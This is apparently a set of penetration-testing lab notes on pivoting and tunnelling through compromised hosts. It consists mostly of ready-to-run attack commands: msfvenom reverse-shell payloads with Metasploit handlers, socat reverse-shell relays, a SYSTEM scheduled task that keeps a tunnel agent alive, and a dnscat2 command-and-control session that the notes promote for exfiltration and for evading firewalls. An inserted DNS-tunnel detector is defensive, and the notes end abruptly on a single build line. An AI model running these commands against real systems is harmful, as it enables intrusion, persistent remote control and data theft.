Portforwarding and tunneling
Commands to enumerate internal networks
PS C:\> Get-NetNeighbor -AddressFamily IPv4
PS C:\> Test-NetConnection -ComputerName 192.168.210.13 -Port 443
PS C:\> Test-WSMan -ComputerName 192.168.1.10
PS C:\> arp -a
PS C:\> route print
Intrusionz3r0X@htb[/htb]$ arp -n
Intrusionz3r0X@htb[/htb]$ route -4
Ping Sweep
Intrusionz3r0X@htb[/htb]$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\> 1..254 | % { $ip="192.168.210.$_"; if (Test-Connection -Count 1 -ComputerName $ip -Quiet) { "$ip`: True" } }
meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
Ligolo NG
#Start the server Proxy
Intrusionz3r0X@htb[/htb]$ sudo ./proxy -selfcert -laddr 10.10.14.3:443
#Create the interface
ligolo-ng >> interface_create --name "ligolo" #Inside the proxy agent
#Connect the agent to our proxy server
Target@htb[/htb]$ ./agent -connect <ip-address>:<port> -ignore-cert
#Switch between sessions
ligolo-ng >> session
#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig
#Create the entry
ligolo-ng >> interface_add_route --name ligolo --route x.x.x.x/24 #Inside the proxy agent
#Start the tunneling
ligolo-ng >> tunnel_start --tun ligolo
Configure double pivoting
For each pivot, create a new interface and add a route for the subnet you need to reach: /24 for the whole subnet or /32 for a single host.
Note: increase the --addr listener port by one for each additional tunnel so the tunnels stay easy to tell apart and manage.
#Create new interface for the new pivot host
ligolo-ng >> interface_create --name "ligolo2" #Inside the proxy agent
#Set up Listener
ligolo-ng >> listener_add --addr 0.0.0.0:1160x --to 127.0.0.1:11601 --tcp
ligolo-ng >> listener_list
Target@htb[/htb]$ ./agent -connect <subnet-ip-address-previous-pivot>:11601 -ignore-cert
#Switch between sessions
ligolo-ng >> session
#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig
#Start the tunneling
ligolo-ng >> tunnel_start --tun ligolo2
#Create the entry
ligolo-ng >> interface_add_route --name ligolo2 --route x.x.x.x/xx #Inside the proxy agent
For unstable sessions, relaunch the agent detached from your shell (a scheduled task on Windows, nohup in the background on Linux):
PS C:\> schtasks /create /tn "MyAgentTask3" /tr "C:\Temp\agent.exe -connect 192.168.110.51:9000 -ignore-cert" /sc once /st $((Get-Date).AddMinutes(1).ToString("HH:mm")) /ru SYSTEM
Target@htb[/htb]$ nohup ./agent -connect 192.168.110.55:9001 -ignore-cert > agent.log 2>&1 &
Chisel
#The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host.
target@WEB01:~$ ./chisel server -v -p 1234 --socks5
Intrusionz3r0X@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks
#If a firewall restricts inbound connections to the pivot host, use reverse tunneling instead
Intrusionz3r0X@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5
target@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks
Chisel double pivoting
On our local Kali:
Intrusionz3r0X@htb[/htb]$ ./chisel_linux server --socks5 -p 9001 --reverse
Modify the
#Add the lines one at a time, as each tunnel comes up; otherwise the proxy chain does not work
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090
#Now close any SOCKS4 connection (e.g. an SSH dynamic port forward) and comment out the socks4 entry in /etc/proxychains
#socks4 127.0.0.1 9050
Pivot Host:
./chisel_linux client 10.10.14.227:9001 R:9999:socks
./chisel_linux server -p 9002 --reverse --socks5
Subnetwork Target host:
chisel.exe client 172.16.8.120:9002 R:8888:socks
Scan every host in the IP list with a one-liner
Target@htb[/htb]$ wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
Target@htb[/htb]$ chmod +x nmap
Target@htb[/htb]$ cat alive_host.txt
192.168.110.1
192.168.110.51
192.168.110.52
192.168.110.53
192.168.110.54
192.168.110.55
Target@htb[/htb]$ while read ip; do ./nmap -p- --open -Pn -n -T5 --min-rate 3000 -vvv -oG "${ip}_tcp_allports" "$ip"; done < alive_host.txt
Local Port Forwarding over SSH
#Local Port Forwarding over SSH
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
#Dynamic SSH tunneling over SOCKS proxy
Intrusionz3r0X@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64
Remote/Reverse Port Forwarding with SSH
#Remote/Reverse Port Forwarding with SSH
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
msf6 exploit(multi/handler) > run
Intrusionz3r0X@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
#Execute payload
Meterpreter Tunneling & Port Forwarding
#Meterpreter Tunneling & Port Forwarding
Intrusionz3r0X@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
#Background the Meterpreter session with ctrl+z
#Configuring MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run
#Creating Routes with AutoRoute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run
#It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.
meterpreter > run autoroute -s 172.16.5.0/23
#Listing Active Routes with AutoRoute
meterpreter > run autoroute -p
#Port Forwarding
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
#Reverse Port Forwarding
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
Socat
#Starting Socat Listener
ubuntu@Webserver:~$ socat TCP4-LISTEN:<intermediaryHostPort>,fork TCP4:10.10.14.18:<AttackhostPort>
#Socat Reverse shell
target@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:443
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 -f exe -o exploit.exe LPORT=8080
SSH Pivoting with Sshuttle
Intrusionz3r0X@htb[/htb]$ sudo apt-get install sshuttle
Intrusionz3r0X@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 <ip-range> -v
RPivot
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git
Intrusionz3r0X@htb[/htb]$ sudo apt-get install python2.7
#Alternative to install python2.7
Intrusionz3r0X@htb[/htb]$ curl https://pyenv.run | bash
Intrusionz3r0X@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ source ~/.bashrc
Intrusionz3r0X@htb[/htb]$ pyenv install 2.7
Intrusionz3r0X@htb[/htb]$ pyenv shell 2.7
#Running server.py from the Attack Host
Intrusionz3r0X@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
#Running client.py on the pivot host to create the SOCKS tunnel
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
#NTLM Authentication (If the internal network uses an HTTP proxy with NTLM authentication)
ubuntu@WEB01:~/rpivot$ python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
Port Forwarding with Windows Netsh
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4
DNS Tunneling with Dnscat2
Dnscat2 tunnels data through the DNS protocol over an encrypted command-and-control (C2) channel. By embedding data in DNS TXT records, it provides covert communication between an attacker's server and a compromised host, which can bypass traditional network defenses such as firewalls and intrusion detection systems; this makes it a potent tool for exfiltrating data and for covertly maintaining remote control over compromised systems.
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/iagox86/dnscat2.git
Intrusionz3r0X@htb[/htb]$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
#DNSCAT2 for windows
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/lukebaggett/dnscat2-powershell.git
PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd
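The flip side of the dnscat2 section above, as an added example that is not part of the original notes: a small detector that scans DNS query logs for the two traits dnscat2-style tunnelling leaves behind (long high-entropy subdomain labels under one base domain, and bursts of TXT queries from a single client). The "timestamp client qtype qname" log layout, the sample lines and the thresholds are all assumptions constructed for the example.

```python
# Added example, not from the original notes. Detects DNS-tunnelling traits
# in a constructed query log: encoded-looking labels and TXT-query bursts.
import math
import re
from collections import Counter

# Constructed sample lines in an assumed "timestamp client qtype qname" layout.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 TXT 3a7f1c9e0b2d4f6a8c1e3b5d7f9a1c3e.inlanefreight.local
10:00:02 10.0.0.5 TXT 5d2e8b1a7c3f9e0d6b4a2c8e1f7d3b9a.inlanefreight.local
10:00:03 10.0.0.5 TXT 9c4b7e2a1d8f3c6e0b5a7d2f4e8c1a3b.inlanefreight.local
10:00:03 10.0.0.7 TXT _dmarc.example.com
10:00:04 10.0.0.5 TXT 1e6d3a9f8b2c7e4d0a5b3c9f6e2d8a1c.inlanefreight.local
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

def shannon_entropy(s: str) -> float:
    """Bits per character; hex-encoded tunnel chunks sit near 3.5-4, words far lower."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def base_domain(qname: str) -> str:
    """Last two labels, e.g. 'inlanefreight.local' (no public-suffix handling)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def suspicious_labels(qname: str, min_len: int = 24, min_entropy: float = 3.0) -> bool:
    """True when any subdomain label is long and random-looking (assumed thresholds)."""
    labels = qname.rstrip(".").split(".")[:-2]
    return any(len(l) >= min_len and shannon_entropy(l) >= min_entropy for l in labels)

def detect_dns_tunnel(log_text: str, txt_threshold: int = 3) -> dict:
    """Map (client, base_domain) -> reasons, for pairs that look like a tunnel."""
    txt_counts, encoded = Counter(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed layout
        _, client, qtype, qname = m.groups()
        key = (client, base_domain(qname))
        if qtype.upper() == "TXT":
            txt_counts[key] += 1
        if suspicious_labels(qname):
            encoded.add(key)
    flagged = {}
    for key in set(txt_counts) | encoded:
        reasons = []
        if txt_counts[key] >= txt_threshold:
            reasons.append(f"{txt_counts[key]} TXT queries")
        if key in encoded:
            reasons.append("high-entropy labels")
        if reasons:
            flagged[key] = reasons
    return flagged
```

Legitimate TXT lookups such as the _dmarc query stay below both thresholds, while the single client hammering one base domain with encoded labels is the only pair reported.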
ICMP Tunneling
go build --ldflags '-linkmode external -extldflags "-static"'